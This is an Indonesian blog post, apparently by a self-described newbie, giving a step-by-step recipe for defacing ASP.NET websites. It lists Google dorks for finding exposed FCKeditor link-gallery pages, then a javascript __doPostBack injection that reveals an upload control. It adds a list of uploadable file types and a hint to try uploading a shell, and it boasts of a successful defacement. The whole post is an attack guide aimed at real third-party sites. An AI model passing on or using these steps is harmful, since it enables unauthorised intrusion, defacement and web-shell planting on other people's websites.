Coba-coba deface .aspx
berikut ini cara yang pernah saya gunakan saat belajar nyisipi page yang ‘ilegal’ ke website target, langsung aja ikuti langkah2nya. ya klo masih ada celah, bisa masuk klo ga bisa ya bagus, berarti si om mimin dah nutup pintunya rapat2… hehe..
Langkah-langkah :
1. Dorknya dibawah ini:
inurl:Fck/fcklinkgallery.aspx atau inurl:”Portals/0″
maka akan muncul menu pilihan Link Type:
– URL ( A Link To An External Resource )
– Page ( A Page On Your Site )
– File ( A File On Your Site )
2. Pilih >> File ( A File On Your Site )
3. masukin javascript dibawah ini di URL,trus jalanin /enter
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Nanti akan muncul browse utk upload file,tgl di upload aja
Untuk file yg bisa di upload antara lain :
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
shell ? coba aja 
Sebagai Bahan Pembelajaran… Ini hasil ane sementara… maaf kalo jelek bgt hasilnya.. maklum newbie lagi nyoba2…hahaha…
Original Post :
Coba2 Deface aspx, Berhasil Jga
Coba2 Deface aspx, Berhasil Jga
